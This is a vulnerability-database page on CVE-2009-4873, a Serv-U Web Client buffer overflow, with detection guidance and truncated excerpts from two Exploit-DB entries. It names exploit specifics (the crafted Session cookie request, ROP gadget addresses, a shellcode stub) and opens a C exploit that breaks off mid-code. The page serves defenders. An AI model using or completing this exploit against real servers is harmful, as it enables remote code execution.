CVE-2009-4873
published 2010-05-26CVE-2009-4873: Stack-based buffer overflow in the HTTP server in Rhino Software Serv-U Web Client 9.0.0.5 allows remote attackers to cause a denial of service (server crash)…
PriorityP267critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
20.55%
97.2th percentile
Stack-based buffer overflow in the HTTP server in Rhino Software Serv-U Web Client 9.0.0.5 allows remote attackers to cause a denial of service (server crash) or execute arbitrary code via a long Session cookie.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rhinosoft | serv-u | — | — |
Detection & IOCsextracted from sources · hover to see the quote
cookieSession=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8<oversized payload>↗
- →Detect HTTP POST requests to port 80 containing a 'Session' cookie value exceeding normal length (e.g., >1000 bytes), specifically prefixed with '_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814'. ↗
- →Alert on HTTP POST requests where the Cookie header contains both 'killmenothing' and an oversized 'Session=' field — this exact combination appears in both public exploit PoCs. ↗
- →Monitor for the ROP gadget address 0x961ea378 (pop esi + ret from mfc90u.dll) in HTTP POST body payloads, used for DEP bypass on Windows 2003 R2 SP2. ↗
- →Monitor for the ROP gadget address 0x4928b00f (add esp, 0x??? + ret) embedded within the Session cookie payload at offset (41000-62)*2+20. ↗
- →Detect infinite loop shellcode stub 0xebfe (JMP $-2) embedded in HTTP POST payloads at offset 48 within the Session cookie field. ↗
- →Flag HTTP POST requests with Content-Type 'multipart/form-data' and Content-Length of 0 combined with an abnormally large Cookie header — this is the exact request structure used by both PoC exploits. ↗
- ·The exploit targets port 80 (HTTP) specifically; if the Serv-U WebClient is configured on a non-standard port, detection rules must be adjusted accordingly. ↗
- ·The DEP bypass ROP chain (mfc90u.dll gadgets) is specific to Windows Server 2003 R2 SP2 fully patched; the exploit may behave differently or fail on other OS versions. ↗
- ·The recommended workaround is to disable the WebClient Service entirely and rely on FTP/SFTP components only, which eliminates the HTTP attack surface. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (2)
exploitdb·2009-11-05
CVE-2009-4873 Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (2)
Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (2)
---
/*
!!!FOR EDUCATIONAL USE ONLY!!!
M.Yanagishita Nov 2, 2009
!!!FOR EDUCATIONAL USE ONLY!!!
*/
#include
#include
#pragma comment(lib, "ws2_32")
#define Die(a) if(a){return;}
char request[] =
"POST / HTTP/1.1\r\nHost: %s\r\nCookie: killmenothing; SULang=de%%2CDE; themename=vista;"
" Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814%s\r\n"
"Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\nContent-Length: 0\r\n\r\n";
void main(int argc, char **argv)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int len, sent, r;
char *buf = new char[120000];
char *payload = new char[100000];
Die(argch_addr);
Die((s
Exploit-DB
Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (1)
exploitdb·2009-11-02
CVE-2009-4873 Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (1)
Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (1)
---
-- KC Security PUBLIC ADVISORY -- http://www.rangos.de --
11-01-2009
RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow
Background
Serv-U includes a simple, browser-based transfer client perfect
for every business environment. The Web Client is accessed through
a standard web browser and features an unintimidating, familiar interface.
It is a great way for sharing photos and image files with clients and
co-workers due to its configurable thumbnail view that allows remote
images to be quickly viewed without downloading the entire file.
An additional slideshow view offers a fast way to share a collection
of photos from your latest projects. When using Serv-U, photo sharing
sites and large email attachments are a thi
No writeups or analysis indexed.
http://secunia.com/advisories/37228http://www.rangos.de/ServU-ADV.txthttp://www.securityfocus.com/bid/36895http://www.vupen.com/english/advisories/2009/3116http://secunia.com/advisories/37228http://www.rangos.de/ServU-ADV.txthttp://www.securityfocus.com/bid/36895http://www.vupen.com/english/advisories/2009/3116
2010-05-26
Published